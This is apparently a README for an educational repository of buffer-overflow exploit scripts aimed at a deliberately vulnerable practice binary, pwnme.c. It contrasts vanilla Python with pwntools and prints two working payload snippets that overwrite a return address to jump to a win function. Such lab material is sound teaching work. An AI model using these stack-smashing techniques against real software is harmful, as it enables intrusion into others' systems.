This repository contains several Python scripts to create payloads for exploiting buffer overflow vulnerabilities in a vulnerable binary called pwnme.c. The challenges demonstrate the use of both standard Python and the pwntools library to craft and send payloads to the vulnerable application.
The primary goal is to overwrite the return address of the function vuln to redirect the execution flow to either win1 or win2, allowing the attacker to gain a shell access or a predefined victory message.
pwnme.c: The source code of the vulnerable application, which contains a buffer overflow vulnerability in thevulnfunction.- Scripts:
vanilla_boilerplate.pyvanilla_demo.pyvanilla_full.pypwntools_boilerplate.pypwntools_demo.pypwntools_full.py
These scripts use standard Python capabilities to generate and send payloads directly to the vulnerable application.
-
vanilla_boilerplate.py: Sends a simple payload to the application without exploiting the buffer overflow. -
vanilla_demo.py: Constructs a payload to call thewin1function by overwriting the return address after filling the buffer. -
vanilla_full.py: Crafts a more complex payload to target thewin2function, providing the necessary argument to trigger the victory condition.
# Usage: python3 vanilla_demo.py | ./pwnme
import sys
# Create your bytes data
payload = b''
payload += b'A' * 16 # fill the buffer
payload += b'B' * 8 # overwrite some other misc data on the stack
payload += b'C' * 4 # padding for ebp
payload += b'\xf3\x91\x04\x08' # win1 function address
payload += b'\n' # ending newline to terminate gets() read
sys.stdout.buffer.write(payload)These scripts leverage the pwntools library, which provides useful functions and methods tailored for exploit development and binary manipulation.
-
pwntools_boilerplate.py: Similar to the vanilla boilerplate, it sends a simple payload without exploiting the vulnerability. -
pwntools_demo.py: Automatically constructs the payload to callwin1, utilizing thepwntoolsfunctionalities for ease of use. -
pwntools_full.py: Generates a detailed payload that overwrites the return address and provides an argument forwin2, fully utilizing the pwntools library to handle ELF file parsing and function address retrieval.
# Usage: python3 pwntools_demo.py
from pwn import *
e = ELF('./pwnme')
p = process('./pwnme')
payload = b''
payload += b'A' * 16 # fill the buffer
payload += b'B' * 8 # overwrite some other misc data on the stack
payload += b'C' * 4 # padding for ebp
payload += p32(e.functions.win1.address) # win1 function address
p.sendline(payload) # send the payload
p.interactive() # make the process interactive in the terminal| Feature | Vanilla Python | Pwntools |
|---|---|---|
| Address Retrieval | Manual, require hardcoding addresses | Automatic via ELF class |
| Sending Payloads | Uses sys.stdout.buffer.write() |
p.sendline() or p.send() |
| Process Handling | Requires manual process management | Handles process management and GDB debugging seamlessly |
This repository provides an educational foundation for understanding and working with buffer overflow vulnerabilities in C programs. By contrasting the use of vanilla Python with the capabilities of pwntools, users can appreciate the different levels of complexity and efficiency in exploit development.
To run the challenges, you can execute the corresponding Python script and pipe its output into the vulnerable binary. Ensure that you have the necessary permissions and environment to execute these scripts securely.
# Example command for executing the vanilla full exploit
python3 vanilla_full.py | ./pwnmeAdjust the commands for pwntools scripts similarly:
# Example for pwntools full exploit
python3 pwntools_full.pyMake sure to compile pwnme.c using the appropriate flags before running the scripts.
Good luck and happy hacking!